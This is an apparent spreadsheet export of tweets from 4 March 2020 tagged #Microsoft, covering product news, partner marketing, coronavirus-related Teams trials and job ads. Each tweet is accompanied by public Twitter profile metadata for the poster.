    <t>{'id': 278302600, 'id_str': '278302600', 'name': 'Abtin Shakouri', 'screen_name': 'ashakouri1', 'location': 'Los Angeles', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 91, 'friends_count': 389, 'listed_count': 0, 'created_at': 'Thu Apr 07 00:58:03 +0000 2011', 'favourites_count': 180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1145,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'http://pbs.twimg.com/profile_images/474319766434222080/w1yOFYff_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474319766434222080/w1yOFYff_normal.jpeg',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</si>
  <si>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Wed Mar 04 09:05:10 +0000 2020</t>
  </si>
  <si>
    <t>Developer Mechanism In The Modern Microsoft Edge
Microsoft's new Chromium-based browser has recently its subsequent public stable release, divulging Edge 80...
Read More: https://t.co/IYoxNzBtHe
#microsoft #release #windows #microsoftedge #chromium #edge #likeitsolutions https://t.co/ybdxnViDJw</t>
  </si>
  <si>
    <t>{'id': 1195303819715993600, 'id_str': '1195303819715993600', 'name': 'likeitsolutions', 'screen_name': 'likeitsolutions', 'location': '', 'description': 'LIKEITSOLUTIONS is an interactive design and creative web &amp; mobile development company.\nTechnology is changing the world around us.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Fri Nov 15 11:34:12 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195308514392117248/mabaq7xN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195308514392117248/mabaq7xN_normal.jpg',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</si>
  <si>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09:05:08 +0000 2020</t>
  </si>
  <si>
    <t>Are you effectively engaging your #remoteemployees ?
Our free guide explains how to use #Yammer and #Teams to empower the work from anywhere culture.
Download today.
https://t.co/7CKEUfht4L
#employeeengagement #peoplefirst #remoteagency #sharepointagency #microsoft https://t.co/abMMX94YMY</t>
  </si>
  <si>
    <t>Wed Mar 04 09:04:00 +0000 2020</t>
  </si>
  <si>
    <t>How is your broom closet more secure than a server room with bank-level security? The short answer is: you need to upgrade your IT infrastructure and  and #Microsoft can help. https://t.co/iAORPMQfoE</t>
  </si>
  <si>
    <t>{'id': 1188684079174053888, 'id_str': '1188684079174053888', 'name': 'Dean Barnett', 'screen_name': 'DeanBar23839945', 'location': 'Perth, Perth (WA)', 'description': 'Microsoft 365 and Dynamics 365 for end to end Operational Management in Australia and around the world.', 'url': 'https://t.co/77I1YsuJ1Y', 'entities': {'url': {'urls': [{'url': 'https://t.co/77I1YsuJ1Y', 'expanded_url': 'http://www.metisc.com', 'display_url': 'metisc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 10, 'listed_count': 0, 'created_at': 'Mon Oct 28 05:09:14 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1188684245754994688/j7n3yI9h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188684245754994688/j7n3yI9h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1188684079174053888/1572239821',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</si>
  <si>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09:01:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft,# Accenture team up to boost social enterprises
"Microsoft on Wednesday announced a partnership with Accenture to help deepen the reach of entrepreneurs and start-ups that are focused"
Read Here :https://t.co/xOBm3degOI
#Microsoft #entrepreneurs #start-ups #SCAI https://t.co/KT8vM7ir6c</t>
  </si>
  <si>
    <t>{'id': 959158556074356736, 'id_str': '959158556074356736', 'name': 'Vdeshi', 'screen_name': 'VdeshiUK', 'location': 'London, England', 'description': 'Videshi ðŸ‡¬ðŸ‡§ but V R Deshi ðŸ‡®ðŸ‡³ Latest news related to entertainment,sports,culture from UK and India', 'url': 'https://t.co/DHGH00lbtf', 'entities': {'url': {'urls': [{'url': 'https://t.co/DHGH00lbtf', 'expanded_url': 'http://www.vdeshi.co.uk', 'display_url': 'vdeshi.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1138, 'friends_count': 111, 'listed_count': 1, 'created_at': 'Thu Feb 01 20:16:34 +0000 2018', 'favourites_count': 114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2506,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'http://pbs.twimg.com/profile_images/983817166670782464/UETx3PQG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/983817166670782464/UETx3PQG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/959158556074356736/1542653731',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</si>
  <si>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09:01:34 +0000 2020</t>
  </si>
  <si>
    <t>Here's this week's #Office365 #WednesdayWisdom!
#SharePoint will now give relevant suggestions for next steps based on how SharePoint is being used!
#microsoft #microsoft365 #hr #humanresources #AI</t>
  </si>
  <si>
    <t>{'id': 166978268, 'id_str': '166978268', 'name': 'PointSolutions', 'screen_name': 'ps_software', 'location': 'South Yorkshire', 'description': 'PointSolutions is a SharePoint Solutions Specialist based in the UK.  We deliver SharePoint Collaboration, Applications and Services.\n#Learningpoint365', 'url': 'http://t.co/s2TqbY3XBx', 'entities': {'url': {'urls': [{'url': 'http://t.co/s2TqbY3XBx', 'expanded_url': 'http://www.pointsolutionsuk.com', 'display_url': 'pointsolutionsuk.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 258, 'friends_count': 122, 'listed_count': 23, 'created_at': 'Thu Jul 15 13:17:05 +0000 2010', 'favourites_count': 131, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1067, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2072B9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/505357729066520576/jVT8I9uX_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/505357729066520576/jVT8I9uX_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/166978268/1468925075', 'profile_link_color': '1B95E0',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</si>
  <si>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09:01:04 +0000 2020</t>
  </si>
  <si>
    <t>Read my Mar 4 #Microsoft Newsletter featuring Microsoft cancels... https://t.co/4qeN7puzPx Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Wed Mar 04 09:01:01 +0000 2020</t>
  </si>
  <si>
    <t>Office 365: Almost Any Amount You Spend to Avoid a Phishing Attack is Worth it
https://t.co/o3gMwSqT2R
#Microsoft #Office365 #email #phishing https://t.co/ofHaDlrW74</t>
  </si>
  <si>
    <t>{'id': 1073278729562910720, 'id_str': '1073278729562910720', 'name': 'phishprotection', 'screen_name': 'phishprotection', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 169, 'friends_count': 189, 'listed_count': 0, 'created_at': 'Thu Dec 13 18:09:24 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 174, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1073283138615308289/23rBpFdu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1073283138615308289/23rBpFdu_normal.jpg',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</si>
  <si>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09:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Tomorrow in Lisbon, dont miss Maria Jordan who will talks about #Microsoft #Hybridcloud Strategy with the new #AzureStack components #AzureStackHub #AzurestackHCI #AzureArc : Register at https://t.co/AsFDKgHeqt 
#HPE #HCI @PTMicrosoft @luis_silva_in #WomenInTech @Joao12Ferreira https://t.co/QRolMtZR7A</t>
  </si>
  <si>
    <t>Wed Mar 04 09:00:39 +0000 2020</t>
  </si>
  <si>
    <t>We jump to the ceiling with joy!  Maybe we jumped through it!  Being a GOLD is and always has been our ambition and we are extremely happy that the hard work is paying off! Thank you Microsoft! 
#microsoft #gold #partners #proud #joyfulBI #datalovers https://t.co/Vcx4KmVVSl</t>
  </si>
  <si>
    <t>{'id': 2414921840, 'id_str': '2414921840', 'name': 'Joyful Craftsmen', 'screen_name': 'JoyfulCraftsmen', 'location': 'HlavnÃ­ mÄ›sto Praha, ÄŒeskÃ¡ republika', 'description': '#BusinessIntelligence agency based in #Prague. We are experts in #Microsoft Data Platform ðŸ™Œ. #BI #sql #software #joyfulbi #technology #innovation', 'url': 'http://t.co/48y50eeZ0h', 'entities': {'url': {'urls': [{'url': 'http://t.co/48y50eeZ0h', 'expanded_url': 'http://www.joyfulcraftsmen.com', 'display_url': 'joyfulcraftsmen.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1018, 'friends_count': 183, 'listed_count': 43, 'created_at': 'Thu Mar 27 21:35:03 +0000 2014', 'favourites_count': 564, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 876,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'http://pbs.twimg.com/profile_images/795989905226825728/1rWS5IJi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/795989905226825728/1rWS5IJi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2414921840/1582820751',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</si>
  <si>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09:00:27 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Goes #All-In On #RPA (Robotic Process Automation) https://t.co/QC2ndbegy8</t>
  </si>
  <si>
    <t>Wed Mar 04 09:00:25 +0000 2020</t>
  </si>
  <si>
    <t>"#Microsoft #Excel might be the most dangerous software on the planet - @forbes  
#WednesdayInsights #Data #Risk #Automation #Cloud https://t.co/rHCEhDvXas</t>
  </si>
  <si>
    <t>{'id': 360179030, 'id_str': '360179030', 'name': 'HTI Labs', 'screen_name': 'htilabs', 'location': 'London - UK', 'description': 'High Tech Innovation Labs - #BigData, #Innovation and an awesome product for Microsoft Excel users called #Schematiq - @schematiq', 'url': 'https://t.co/dav6kxRtJB', 'entities': {'url': {'urls': [{'url': 'https://t.co/dav6kxRtJB', 'expanded_url': 'http://schematiq.com', 'display_url': 'schematiq.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 293, 'friends_count': 983, 'listed_count': 106, 'created_at': 'Mon Aug 22 20:24:22 +0000 2011', 'favourites_count': 443, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 977,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'http://pbs.twimg.com/profile_images/956926959614939138/CzzHABNk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/956926959614939138/CzzHABNk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/360179030/1551897054',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</si>
  <si>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09:00:15 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/BgLGQUULYH</t>
  </si>
  <si>
    <t>Wed Mar 04 08:57:20 +0000 2020</t>
  </si>
  <si>
    <t>Not a great start to the electronics side of the day. Sure all we can do is wait a sec. #microsoft fun. #NoPanic https://t.co/WQYdKjC0ln</t>
  </si>
  <si>
    <t>{'id': 1100749976135786497, 'id_str': '1100749976135786497', 'name': 'Confident Potential', 'screen_name': 'ConfidentPoten1', 'location': 'Ireland', 'description': "I'm Stephen, helping people that feel stuck or frustrated in life,career &amp; business to craft a vision theyâ€™d â¤ï¸, translate that into reality #ConfidentPotential", 'url': 'https://t.co/jHMKaNYozg', 'entities': {'url': {'urls': [{'url': 'https://t.co/jHMKaNYozg', 'expanded_url': 'http://bit.ly/2TRvYSO', 'display_url': 'bit.ly/2TRvYSO', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 303, 'friends_count': 415, 'listed_count': 2, 'created_at': 'Wed Feb 27 13:30:20 +0000 2019', 'favourites_count': 76, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3967, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1178785474619564033/4Jp9mgR__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178785474619564033/4Jp9mgR__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1100749976135786497/1571346942',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</si>
  <si>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08:55:06 +0000 2020</t>
  </si>
  <si>
    <t>You + Office365 + AMT Evolve = a more efficient business. &amp;gt;&amp;gt; https://t.co/XTi306HwQO #Office365 #SharePoint #Microsoft #BusinessIntelligence https://t.co/Tn6rdHB1wR</t>
  </si>
  <si>
    <t>{'id': 183392657, 'id_str': '183392657', 'name': 'AMT Evolve', 'screen_name': 'amtevolve', 'location': 'Portsmouth, UK', 'description': "Need a hand with Office 365? Stop looking, you've found your experts.\nWe also build #intranets, #apps and #databases to put IT to work for companies like yours.", 'url': 'http://t.co/i7FnbVTA', 'entities': {'url': {'urls': [{'url': 'http://t.co/i7FnbVTA', 'expanded_url': 'http://www.amtevolve.com', 'display_url': 'amtevolve.com', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 613, 'friends_count': 1017, 'listed_count': 36, 'created_at': 'Thu Aug 26 22:10:13 +0000 2010', 'favourites_count': 320, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2915,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'http://pbs.twimg.com/profile_images/1169935698679521282/Avje4T11_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169935698679521282/Avje4T11_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/183392657/1567768990', 'profile_link_color': 'FC8F00',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</si>
  <si>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08:54:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft (@Microsoft) on Wednesday announced a partnership with #Accenture (@Accenture) to help deepen the reach of entrepreneurs and start-ups that are focused on social impact and sustainability.
Photo: IANS https://t.co/9cItomovqW</t>
  </si>
  <si>
    <t>{'id': 1169950443692158977, 'id_str': '1169950443692158977', 'name': 'IANSLIFE', 'screen_name': 'ianslife_in', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 93, 'friends_count': 15, 'listed_count': 2, 'created_at': 'Fri Sep 06 12:28:28 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5783, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1175067647420948480/Lq3yGdll_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175067647420948480/Lq3yGdll_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1169950443692158977/1568992935',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</si>
  <si>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08:52:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has quietly started offering free trials of its premium Teams chat app to 'support public health and safety' amid the #coronavirus outbreak reports @ashannstew for @BusinessInsider https://t.co/jZlGPlUyQs #Technology #Microsoft #Health #Safety</t>
  </si>
  <si>
    <t>Wed Mar 04 08:47:56 +0000 2020</t>
  </si>
  <si>
    <t>Improving the game with a  technology partnership, #Microsoft and the #NFL are continuing to innovate with Surface devices and Microsoft Teams.  https://t.co/l5VrvTUYgb #Sports #Innovation #Technology</t>
  </si>
  <si>
    <t>Wed Mar 04 08:47:37 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10: The end of local accounts?
#ashampoo #blog #windows #microsoft #accountmanagement https://t.co/4fGZIbpxtO</t>
  </si>
  <si>
    <t>{'id': 1124416903, 'id_str': '1124416903', 'name': 'Angela Woisch', 'screen_name': 'angie12147', 'location': 'Oldenburg (Oldenburg)', 'description': '', 'url': 'https://t.co/jtwZXD1RGw', 'entities': {'url': {'urls': [{'url': 'https://t.co/jtwZXD1RGw', 'expanded_url': 'http://ashampoo.com', 'display_url': 'ashampoo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 104, 'listed_count': 2, 'created_at': 'Sun Jan 27 08:38:49 +0000 2013', 'favourites_count': 711, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/3169037483/940c29963593ac07292a5b9867405503_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3169037483/940c29963593ac07292a5b9867405503_normal.jpeg', 'profile_link_color': '1B95E0',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</si>
  <si>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Mar 04 08:47:00 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are giving away #enterprise conferencing tools due to #coronavirus https://t.co/5fBPp04QOp #ITNews</t>
  </si>
  <si>
    <t>Wed Mar 04 08:45:08 +0000 2020</t>
  </si>
  <si>
    <t>As part of its Wave 1 2020 updates, #Microsoft has announced a whole host of new and improved features for #Dynamics365BusinessCentral which will be released in April. In this blog, we will take you through the biggest &amp;amp; best of these new capabilities https://t.co/OySSGLEKr8 https://t.co/pupjmpvQK8</t>
  </si>
  <si>
    <t>Wed Mar 04 08:43:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's @jamesserra outlines the benefits of SQL Database Managed Instances, including a comparison of IaaS and PaaS. Which is right for you? https://t.co/5zs4e2QyxR</t>
  </si>
  <si>
    <t>Wed Mar 04 08:32:24 +0000 2020</t>
  </si>
  <si>
    <t>MITA's Senior project leader Mariano Debono giving us an explanation towards the current status of Modern Workplace Initiative 
#MITA #Microsoft #Teams #Office365 #MicrosoftChampions https://t.co/5tjJyzAxsg</t>
  </si>
  <si>
    <t>Wed Mar 04 08:32:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's VS Code Python programming language extension gets this new update
Microsoft brings more improvements to the most popular VS Code extension on the Visual Studio marketplace.
#pythoncode #pythondeveloper #python3  #microsoft #newupdate 
https://t.co/Rph1Qb2Vrt https://t.co/8dOlVBAqlI</t>
  </si>
  <si>
    <t>{'id': 1148948041006641153, 'id_str': '1148948041006641153', 'name': 'Sabertooth Technologies', 'screen_name': 'SabertoothTech1', 'location': 'H.No. 336, B/701, Rajakothi Apartment, Civil Lines, Nagpur, Maharashtra 440001', 'description': 'A place where analysis is tangible.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Wed Jul 10 13:32:14 +0000 2019', 'favourites_count': 7,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'http://pbs.twimg.com/profile_images/1148952976905535488/seCI5k-T_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148952976905535488/seCI5k-T_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148948041006641153/1563023942',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</si>
  <si>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08:31:38 +0000 2020</t>
  </si>
  <si>
    <t>Contest Winners: Secure Everything with #Azure Sphere by Hackster, Microsoft, and AVNet
 #Hackster #iot #Microsoft
https://t.co/c6aH6xHFUn</t>
  </si>
  <si>
    <t>Wed Mar 04 08:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Growing up with two parents who are deaf, The dad who helped raine an engineer. #Microsoft.  #AIforAccessibility  #WomenInSTEM #WomenInScience  #technology #tech #education https://t.co/PvxHM87IKl</t>
  </si>
  <si>
    <t>Wed Mar 04 08:24:48 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are giving away enterprise conferencing tools due to coronavirus. @ASBIndia #edtech #educhat #EducationMatters #EducationalTechnology #Microsoft365 #GoogleEDU https://t.co/rq2jNhMjrv</t>
  </si>
  <si>
    <t>{'id': 100702878, 'id_str': '100702878', 'name': 'Mario Fishery', 'screen_name': 'mariofishery', 'location': 'Mumbai', 'description': 'Director Technology Support @asbindia #Technology #CyberSecurity #CyberLaw #CyberCrime #VR #AR #ML #ArtificialIntelligence #MachineLearning #EdTech #GDPR', 'url': 'https://t.co/dQIPDhrm7o', 'entities': {'url': {'urls': [{'url': 'https://t.co/dQIPDhrm7o', 'expanded_url': 'http://www.asbindia.org', 'display_url': 'asbindia.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 875, 'friends_count': 2158, 'listed_count': 22, 'created_at': 'Thu Dec 31 06:37:06 +0000 2009', 'favourites_count': 3643, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2251,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'http://pbs.twimg.com/profile_images/1158400168472924162/9YcQETri_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158400168472924162/9YcQETri_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/100702878/1481972928', 'profile_link_color': '1B95E0',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</si>
  <si>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Wed Mar 04 08:21:24 +0000 2020</t>
  </si>
  <si>
    <t>#Business blunders: #Microsoft loses $1 billion developing the Kin range of #mobile phones https://t.co/GB6X0bSFId https://t.co/jPxGyRrmdK</t>
  </si>
  <si>
    <t>{'id': 710537164816306176, 'id_str': '710537164816306176', 'name': 'w1nnersclub', 'screen_name': 'w1nnersclub', 'location': 'London, England', 'description': "Satirical workplace website and ecommerce store providing everything you'll never need to become successful in your career", 'url': 'https://t.co/8rZQk8ADbc', 'entities': {'url': {'urls': [{'url': 'https://t.co/8rZQk8ADbc', 'expanded_url': 'http://www.w1nnersclub.com', 'display_url': 'w1nnersclub.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 364, 'listed_count': 15, 'created_at': 'Thu Mar 17 18:43:56 +0000 2016', 'favourites_count': 480, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3097, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/780028437251629056/6vCklgHP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/780028437251629056/6vCklgHP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/710537164816306176/1474924143',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</si>
  <si>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08:18:27 +0000 2020</t>
  </si>
  <si>
    <t>DarkReading: Former Microsoft Software Engineer Convicted of Fraud https://t.co/hb7Sr7JS9L 
#Microsoft #engineer #fraud</t>
  </si>
  <si>
    <t>Wed Mar 04 08:17:29 +0000 2020</t>
  </si>
  <si>
    <t>Permanent Secretary Ms.Joyce Dimech delivering her welcoming speech at the Government Workplace Seminar.
#Microsoft #Office365 #Teams #seminar #training #MITA #ict #Government #employees #malta https://t.co/kDhN0OmBma</t>
  </si>
  <si>
    <t>Wed Mar 04 08:17:21 +0000 2020</t>
  </si>
  <si>
    <t>Get the best printing quality by using professional HP Toners, only at https://t.co/5TWTvLTZHn
#tv #samsung #QLed #television #phone #iphone #applewatch #smartphone #watch #technology #IT #laptop #computing #pc #iphone #samsung #apple #android #smartwatch #ITexpert #microsoft #... https://t.co/T9oVGbTx1B</t>
  </si>
  <si>
    <t>{'id': 47608075, 'id_str': '47608075', 'name': 'Netgear.gi', 'screen_name': 'NetgearDotGi', 'location': 'Gibraltar', 'description': "Warm, friendly, customer service, in Gibraltar we'll help you make the right Tech choice.\nFB: https://t.co/eMiuxmf0oD", 'url': 'https://t.co/m617uIKFkf', 'entities': {'url': {'urls': [{'url': 'https://t.co/m617uIKFkf', 'expanded_url': 'http://www.netgear.gi', 'display_url': 'netgear.gi', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/eMiuxmf0oD', 'expanded_url': 'http://facebook.com/NetgearLtd', 'display_url': 'facebook.com/NetgearLtd', 'indices': [94, 117]}]}}, 'protected': False, 'followers_count': 1182, 'friends_count': 1880, 'listed_count': 20, 'created_at': 'Tue Jun 16 12:08:47 +0000 2009', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3102,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'http://pbs.twimg.com/profile_images/265309777/logo100x102_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/265309777/logo100x102_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47608075/1513382236', 'profile_link_color': '3B94D9',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</si>
  <si>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Mar 04 08:16:52 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Outlook Shortcuts #1
#jetkingpbr 
#jetking 
#jetkingporbandar 
#jetkingstudent
#Microsoft
#MicrosoftOutlook
#windows10
#windowsos
#windowsshortcut
#windows 
#windowstrick
#windows https://t.co/FNBJuNsLSR</t>
  </si>
  <si>
    <t>Wed Mar 04 08:16:26 +0000 2020</t>
  </si>
  <si>
    <t>EU alert triggered after #coronavirus disinformation campaign, after #Google #Facebook #Twitter #Microsoft confirmed disinformation including fake remedies. Agreement to remove all harmful content 
https://t.co/8bjeZVtNTK #cybersecurity #FakeNews #COFID19 #VeraJourova</t>
  </si>
  <si>
    <t>Wed Mar 04 08:16:20 +0000 2020</t>
  </si>
  <si>
    <t>#whatdavedidtoday updates for remote working.
Windows 10, SQL2019
Ready for immediate start.
#mvc #csharp #sqlserver #azure #agile #devops #developer #dotnetcore #dotnetdeveloper #leaddeveloper #busy #phone #token #microsoft #graph #katalonstudio #review...https://t.co/Em11Ik1LGn</t>
  </si>
  <si>
    <t>{'id': 1432570922, 'id_str': '1432570922', 'name': 'David MacKillican', 'screen_name': 'DMacKillican', 'location': 'Gloucester', 'description': 'For full information see my LinkedIn profile', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 204, 'listed_count': 2, 'created_at': 'Thu May 16 09:10:17 +0000 2013', 'favourites_count': 2030, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 736,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'http://pbs.twimg.com/profile_images/3671074939/448f93ab7de792be6cba1d4aefc36ed0_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3671074939/448f93ab7de792be6cba1d4aefc36ed0_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1432570922/1372867201',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</si>
  <si>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08:15:13 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 08:13:15 +0000 2020</t>
  </si>
  <si>
    <t>What is this week new in #Microsoft #Intune? You can read it here: https://t.co/FggyZgHDp0 #EMS #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 08:11:20 +0000 2020</t>
  </si>
  <si>
    <t>F-Secure reports a steep rise in hacking attempts https://t.co/Ozrbt1iLZO via @Hybrid_Circle #Microsoft #AWS</t>
  </si>
  <si>
    <t>Wed Mar 04 08:10:22 +0000 2020</t>
  </si>
  <si>
    <t>Want to work in England? View our latest opening: https://t.co/T3SP2erbTb #Microsoft</t>
  </si>
  <si>
    <t>{'id': 108122921, 'id_str': '108122921', 'name': 'TMJ-GBR IT-.NET Jobs', 'screen_name': 'tmj_GBR_itdnet', 'location': 'Great Britain', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Great Britain. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/VizqrCcAfD', 'entities': {'url': {'urls': [{'url': 'https://t.co/VizqrCcAfD', 'expanded_url': 'http://bit.ly/2D0LBhP', 'display_url': 'bit.ly/2D0LBhP', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 203, 'friends_count': 202, 'listed_count': 8, 'created_at': 'Sun Jan 24 23:02:32 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2,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'http://pbs.twimg.com/profile_images/701794291840974848/L_Uv-Wgv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/701794291840974848/L_Uv-Wgv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/108122921/1456155774',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</si>
  <si>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Mar 04 08:09:31 +0000 2020</t>
  </si>
  <si>
    <t>Click the link in our bio to see currently open #Microsoft jobs like "Senior Technical Lead - Middlesbrough" at Emerson Electric Co in #London, England.</t>
  </si>
  <si>
